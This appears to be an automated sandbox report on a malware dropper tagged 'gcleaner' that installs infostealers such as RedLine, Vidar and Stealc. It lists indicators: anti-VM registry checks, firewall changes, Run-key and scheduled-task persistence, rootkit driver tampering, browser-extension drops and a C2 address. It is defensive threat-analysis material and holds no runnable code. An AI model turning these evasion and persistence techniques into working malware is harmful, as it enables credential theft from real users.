gcleaner | 298882eef447afb08c134245d29d689feb30431a4c8595da619f2038f6d8b615

Windows Service

T1543.003

Processes:

setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	GIRYqcKiZvhmj93nqNmYBOcU.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral6/memory/2784-282-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral6/memory/4304-541-0x0000000000400000-0x00000000004C2000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

T1497

Processes:

setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	GIRYqcKiZvhmj93nqNmYBOcU.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	K3WDl2xWvNNnkfn4nYdQExzq.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e02CHlRDyVx8CisrSUbTQs_u.exe

Blocklisted process makes network request 6 IoCs

Processes:

RegAsm.exerundll32.exe

flow pid process

242 4308 RegAsm.exe
244 4308 RegAsm.exe
246 4308 RegAsm.exe
248 4308 RegAsm.exe
251 4308 RegAsm.exe
282 4868 rundll32.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3988 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
242	4308	RegAsm.exe
244	4308	RegAsm.exe
246	4308	RegAsm.exe
248	4308	RegAsm.exe
251	4308	RegAsm.exe
282	4868	rundll32.exe

pid	process
3988	netsh.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exeInstall.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GIRYqcKiZvhmj93nqNmYBOcU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	K3WDl2xWvNNnkfn4nYdQExzq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e02CHlRDyVx8CisrSUbTQs_u.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GIRYqcKiZvhmj93nqNmYBOcU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	K3WDl2xWvNNnkfn4nYdQExzq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e02CHlRDyVx8CisrSUbTQs_u.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

setup.exeInstall.exeP1i57rTqyYvK8Wz1_NY_lX0m.exeKRtjXHn.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation	P1i57rTqyYvK8Wz1_NY_lX0m.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation	KRtjXHn.exe

Executes dropped EXE 34 IoCs

Processes:

K3WDl2xWvNNnkfn4nYdQExzq.exes4AaUwLl6DEajYQi5WVeMPx0.exee02CHlRDyVx8CisrSUbTQs_u.exe4dLTrXqtftUhIwJTRyHSSejV.exeoqnIhEuqPWFLxfGfy_cozJKr.exegNaZnn5CLFQicjVhsTk8gKef.exekN3Wu8RUu2uTrcf2g49JbbJI.exeQcMIl6J7oMLzdIxc7BHVgaQ9.exeP1i57rTqyYvK8Wz1_NY_lX0m.exeGIRYqcKiZvhmj93nqNmYBOcU.exeNYulW0N4e1hPawIOp4plsa35.exeD3wSlOtntlkjBD387yaruAqa.exekwI5msI0GXCECMxCfATKQ50A.exetuZctSq25Sx46OCwloIdBXYG.exe9YVd8Opjg5kP29QMElKldZkn.exeis-VK0NS.tmpthreekingsoftvideo.exeInstall.exethreekingsoftvideo.exedckuybanmlgp.exeMczRWBv.exetuZctSq25Sx46OCwloIdBXYG.execsrss.exeKRtjXHn.exeinjector.exewindefender.exewindefender.exef5VHEXNHF974Dhcz8BdyX288.exef5VHEXNHF974Dhcz8BdyX288.exedcb505dc2b9d8aac05f4ca0727f5eadb.exewup.execsrss.exe713674d5e968cbe2102394be0b2bae6f.exe1bf850b4d9587c1017a75a47680584c4.exe

pid	process
2668	K3WDl2xWvNNnkfn4nYdQExzq.exe
3520	s4AaUwLl6DEajYQi5WVeMPx0.exe
4492	e02CHlRDyVx8CisrSUbTQs_u.exe
4884	4dLTrXqtftUhIwJTRyHSSejV.exe
2772	oqnIhEuqPWFLxfGfy_cozJKr.exe
2104	gNaZnn5CLFQicjVhsTk8gKef.exe
3116	kN3Wu8RUu2uTrcf2g49JbbJI.exe
4744	QcMIl6J7oMLzdIxc7BHVgaQ9.exe
1368	P1i57rTqyYvK8Wz1_NY_lX0m.exe
4964	GIRYqcKiZvhmj93nqNmYBOcU.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
2268	D3wSlOtntlkjBD387yaruAqa.exe
4320	kwI5msI0GXCECMxCfATKQ50A.exe
3488	tuZctSq25Sx46OCwloIdBXYG.exe
884	9YVd8Opjg5kP29QMElKldZkn.exe
4784	is-VK0NS.tmp
3964	threekingsoftvideo.exe
3360	Install.exe
3792	threekingsoftvideo.exe
3548	dckuybanmlgp.exe
3520	MczRWBv.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe
1496	csrss.exe
4808	KRtjXHn.exe
5076	injector.exe
1492	windefender.exe
396	windefender.exe
880	f5VHEXNHF974Dhcz8BdyX288.exe
4160	f5VHEXNHF974Dhcz8BdyX288.exe
1164	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
4944	wup.exe
1076	csrss.exe
5020	713674d5e968cbe2102394be0b2bae6f.exe
5032	1bf850b4d9587c1017a75a47680584c4.exe

Loads dropped DLL 5 IoCs

Processes:

is-VK0NS.tmpkN3Wu8RUu2uTrcf2g49JbbJI.exekwI5msI0GXCECMxCfATKQ50A.exerundll32.exe

pid process

4784 is-VK0NS.tmp
3116 kN3Wu8RUu2uTrcf2g49JbbJI.exe
4320 kwI5msI0GXCECMxCfATKQ50A.exe
4320 kwI5msI0GXCECMxCfATKQ50A.exe
4868 rundll32.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4784	is-VK0NS.tmp
3116	kN3Wu8RUu2uTrcf2g49JbbJI.exe
4320	kwI5msI0GXCECMxCfATKQ50A.exe
4320	kwI5msI0GXCECMxCfATKQ50A.exe
4868	rundll32.exe

Themida packer 21 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral6/memory/4756-0-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4756-5-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4756-6-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4756-7-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4756-8-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4756-9-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4756-10-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4756-11-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4756-20-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4756-28-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
C:\Users\Admin\Documents\SimpleAdobe\GIRYqcKiZvhmj93nqNmYBOcU.exe	themida
behavioral6/memory/4756-189-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4964-280-0x0000000000F80000-0x000000000154B000-memory.dmp	themida
behavioral6/memory/4964-287-0x0000000000F80000-0x000000000154B000-memory.dmp	themida
behavioral6/memory/4964-291-0x0000000000F80000-0x000000000154B000-memory.dmp	themida
behavioral6/memory/4964-362-0x0000000000F80000-0x000000000154B000-memory.dmp	themida
behavioral6/memory/4964-372-0x0000000000F80000-0x000000000154B000-memory.dmp	themida
behavioral6/memory/4964-351-0x0000000000F80000-0x000000000154B000-memory.dmp	themida
behavioral6/memory/4964-324-0x0000000000F80000-0x000000000154B000-memory.dmp	themida
behavioral6/memory/4756-303-0x00007FF672630000-0x00007FF672E94000-memory.dmp	themida
behavioral6/memory/4964-302-0x0000000000F80000-0x000000000154B000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 45.155.250.90

description	ioc
Destination IP	45.155.250.90

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Documents\SimpleAdobe\s4AaUwLl6DEajYQi5WVeMPx0.exe	vmprotect
behavioral6/memory/3520-332-0x0000000000540000-0x0000000000E2E000-memory.dmp	vmprotect
behavioral6/memory/3520-561-0x0000000000540000-0x0000000000E2E000-memory.dmp	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

tuZctSq25Sx46OCwloIdBXYG.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

Processes:

setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	GIRYqcKiZvhmj93nqNmYBOcU.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	K3WDl2xWvNNnkfn4nYdQExzq.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	e02CHlRDyVx8CisrSUbTQs_u.exe

Drops Chrome extension 2 IoCs

Processes:

KRtjXHn.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	KRtjXHn.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	KRtjXHn.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

KRtjXHn.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini KRtjXHn.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

62 bitbucket.org
71 bitbucket.org
80 bitbucket.org
105 bitbucket.org
187 iplogger.org
188 iplogger.org
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

32 ipinfo.io
192 api.myip.com
193 api.myip.com
194 ipinfo.io
195 ipinfo.io
25 api.myip.com
26 api.myip.com
31 ipinfo.io
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	KRtjXHn.exe

flow	ioc
62	bitbucket.org
71	bitbucket.org
80	bitbucket.org
105	bitbucket.org
187	iplogger.org
188	iplogger.org

flow	ioc
32	ipinfo.io
192	api.myip.com
193	api.myip.com
194	ipinfo.io
195	ipinfo.io
25	api.myip.com
26	api.myip.com
31	ipinfo.io

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 48 IoCs

Processes:

KRtjXHn.exepowershell.exepowershell.exepowershell.exesetup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeMczRWBv.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy	GIRYqcKiZvhmj93nqNmYBOcU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	KRtjXHn.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	GIRYqcKiZvhmj93nqNmYBOcU.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	GIRYqcKiZvhmj93nqNmYBOcU.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	MczRWBv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	KRtjXHn.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	KRtjXHn.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	KRtjXHn.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	MczRWBv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	GIRYqcKiZvhmj93nqNmYBOcU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	KRtjXHn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exe

pid process

4756 setup.exe
4964 GIRYqcKiZvhmj93nqNmYBOcU.exe
2668 K3WDl2xWvNNnkfn4nYdQExzq.exe
4492 e02CHlRDyVx8CisrSUbTQs_u.exe

pid	process
4756	setup.exe
4964	GIRYqcKiZvhmj93nqNmYBOcU.exe
2668	K3WDl2xWvNNnkfn4nYdQExzq.exe
4492	e02CHlRDyVx8CisrSUbTQs_u.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

4dLTrXqtftUhIwJTRyHSSejV.exeQcMIl6J7oMLzdIxc7BHVgaQ9.exeD3wSlOtntlkjBD387yaruAqa.exeoqnIhEuqPWFLxfGfy_cozJKr.exekN3Wu8RUu2uTrcf2g49JbbJI.exedckuybanmlgp.exe

description	pid	process	target process
PID 4884 set thread context of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4744 set thread context of 2784	4744	QcMIl6J7oMLzdIxc7BHVgaQ9.exe	RegAsm.exe
PID 2268 set thread context of 2868	2268	D3wSlOtntlkjBD387yaruAqa.exe	WerFault.exe
PID 2772 set thread context of 4308	2772	oqnIhEuqPWFLxfGfy_cozJKr.exe	cmd.exe
PID 3116 set thread context of 4304	3116	kN3Wu8RUu2uTrcf2g49JbbJI.exe	MsBuild.exe
PID 3548 set thread context of 1520	3548	dckuybanmlgp.exe	conhost.exe
PID 3548 set thread context of 4708	3548	dckuybanmlgp.exe	svchost.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

tuZctSq25Sx46OCwloIdBXYG.exef5VHEXNHF974Dhcz8BdyX288.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	tuZctSq25Sx46OCwloIdBXYG.exe
File opened (read-only)	\??\VBoxMiniRdrDN	f5VHEXNHF974Dhcz8BdyX288.exe

Drops file in Program Files directory 14 IoCs

Processes:

KRtjXHn.exe

description	ioc	process
File created	C:\Program Files (x86)\BcCQMXwjU\ofYmWRY.xml	KRtjXHn.exe
File created	C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\IHGjrgy.dll	KRtjXHn.exe
File created	C:\Program Files (x86)\ITFcQRBGgRUn\GqJCMDV.dll	KRtjXHn.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	KRtjXHn.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	KRtjXHn.exe
File created	C:\Program Files (x86)\SwHdQyPSnQdU2\SYMmSSiHCPLFo.dll	KRtjXHn.exe
File created	C:\Program Files (x86)\SwHdQyPSnQdU2\IXDlPKV.xml	KRtjXHn.exe
File created	C:\Program Files (x86)\BcCQMXwjU\YmSHPF.dll	KRtjXHn.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	KRtjXHn.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	KRtjXHn.exe
File created	C:\Program Files (x86)\mfOEuGwqkLFbC\ecRPzMw.dll	KRtjXHn.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	KRtjXHn.exe
File created	C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\fhVzBeL.xml	KRtjXHn.exe
File created	C:\Program Files (x86)\mfOEuGwqkLFbC\Pnhdyer.xml	KRtjXHn.exe

Drops file in Windows directory 8 IoCs

Processes:

csrss.exeschtasks.exetuZctSq25Sx46OCwloIdBXYG.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\bXvtwaJkKQEzfXjvnG.job	schtasks.exe
File opened for modification	C:\Windows\rss	tuZctSq25Sx46OCwloIdBXYG.exe
File created	C:\Windows\rss\csrss.exe	tuZctSq25Sx46OCwloIdBXYG.exe
File created	C:\Windows\Tasks\MVZgvzYKAFemhQpXL.job	schtasks.exe
File created	C:\Windows\Tasks\fjXiyaIJtNnEyln.job	schtasks.exe
File created	C:\Windows\Tasks\xxPoWeVRQBzFwCLPV.job	schtasks.exe
File created	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

4200 sc.exe
4480 sc.exe
4024 sc.exe
3524 sc.exe
2424 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4200	sc.exe
4480	sc.exe
4024	sc.exe
3524	sc.exe
2424	sc.exe

Program crash 11 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3628	1368	WerFault.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
1996	1368	WerFault.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
1832	1368	WerFault.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
2880	2868	WerFault.exe	RegAsm.exe
4552	1368	WerFault.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
4928	1368	WerFault.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
1464	1368	WerFault.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
4252	4320	WerFault.exe	kwI5msI0GXCECMxCfATKQ50A.exe
1996	1368	WerFault.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
3300	4308	WerFault.exe	RegAsm.exe
3644	1368	WerFault.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

kwI5msI0GXCECMxCfATKQ50A.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	kwI5msI0GXCECMxCfATKQ50A.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	kwI5msI0GXCECMxCfATKQ50A.exe

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

